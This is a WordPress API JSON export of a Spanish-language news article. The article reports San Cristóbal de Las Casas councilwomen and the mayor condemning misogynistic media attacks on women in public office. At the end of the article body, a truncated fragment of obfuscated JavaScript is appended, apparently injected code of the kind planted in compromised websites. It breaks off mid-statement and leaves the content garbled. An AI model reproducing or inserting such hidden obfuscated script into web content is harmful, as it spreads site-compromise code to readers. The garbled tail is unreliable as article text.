{"id":21380,"date":"2025-04-10T02:50:58","date_gmt":"2025-04-10T02:50:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21380"},"modified":"2025-04-10T02:50:59","modified_gmt":"2025-04-10T02:50:59","slug":"regidoras-de-san-cristobal-alzan-la-voz-contra-la-violencia-mediatica-hacia-mujeres-en-la-funcion-publica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21380","title":{"rendered":"Regidoras de San Crist\u00f3bal alzan la voz contra la violencia medi\u00e1tica hacia mujeres en la funci\u00f3n p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029-1024x682.jpg\" alt=\"\" class=\"wp-image-21381\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250409-WA0029.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 09 de abril de 2025.- Durante la sesi\u00f3n ordinaria de Cabildo celebrada este mi\u00e9rcoles, la regidora Mar\u00eda Jos\u00e9 Velasco Moscoso, presidenta de la Comisi\u00f3n de Igualdad de G\u00e9nero y Acceso a una Vida Libre de Violencia, conden\u00f3 los actos de violencia medi\u00e1tica dirigidos hacia funcionarias municipales por parte de algunos medios de comunicaci\u00f3n.<\/p>\n\n\n\n<p>En su intervenci\u00f3n, lament\u00f3 que en publicaciones de una plataforma digital se est\u00e9n emitiendo comentarios machistas y mis\u00f3ginos en contra de las mujeres del Ayuntamiento, incluyendo a la presidenta municipal y a otras regidoras. \u201cNos hemos visto violentadas con comentarios que, por respeto a todas las mujeres, no puedo repetir\u201d.<\/p>\n\n\n\n<p>Hizo un llamado respetuoso a los medios de comunicaci\u00f3n y periodistas a respetar el trabajo de las mujeres en la pol\u00edtica, destacando la importancia de abordar estos temas con \u00e9tica y responsabilidad. Record\u00f3 que la Ley General de Acceso de las Mujeres a una Vida Libre de Violencia contempla expresamente la violencia medi\u00e1tica, que incluye cualquier tipo de agresi\u00f3n verbal, digital o impresa contra las mujeres, sin importar su cargo.<\/p>\n\n\n\n<p>\u201cComo mujeres que ejercemos cargos p\u00fablicos, tenemos el derecho a ser protegidas. Invitamos a todos a trabajar con \u00e9tica, respeto y dignidad\u201d, concluy\u00f3 Velasco Moscoso.<\/p>\n\n\n\n<p>En este sentido, la presidenta municipal, Mtra. Fabiola Ricci Diestel, se sum\u00f3 al posicionamiento de la regidora y de las dem\u00e1s integrantes del Ayuntamiento contra la violencia medi\u00e1tica de g\u00e9nero, afirmando que \u201cno vamos a permitir m\u00e1s violencia contra las mujeres, ni en lo pol\u00edtico ni en lo personal\u201d, haciendo un llamado a los medios a ejercer la libertad de expresi\u00f3n con responsabilidad y respeto.<\/p>\n\n\n\n<p>La alcaldesa conden\u00f3 los ataques recibidos a trav\u00e9s de redes sociales y enfatiz\u00f3 que ninguna funcionaria se quedar\u00e1 callada ante estos hechos. \u201cNuestra responsabilidad es velar por el bienestar de todas las mujeres, y empieza por nosotras mismas\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>Este posicionamiento fue respaldado por las regidoras Roxana Mar\u00eda Ramos Sangeado, Laura Gabriela Mu\u00f1oz Montoya, Dayana Chac\u00f3n Mart\u00ednez, Lina Irene Li\u00e9vano Alfaro y Linda Higuera Guti\u00e9rrez, quienes tambi\u00e9n exigieron el cese de estas agresiones hacia las mujeres en el \u00e1mbito pol\u00edtico.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 09 de abril de 2025.- Durante la sesi\u00f3n ordinaria de Cabildo celebrada este mi\u00e9rcoles, la regidora Mar\u00eda Jos\u00e9 Velasco Moscoso, presidenta de la Comisi\u00f3n de Igualdad de G\u00e9nero y Acceso a una Vida Libre de Violencia, conden\u00f3 los actos de violencia medi\u00e1tica dirigidos hacia funcionarias municipales por parte de algunos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21381,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21380","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21380"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21380\/revisions"}],"predecessor-version":[{"id":21382,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21380\/revisions\/21382"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21381"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21380"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21380"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}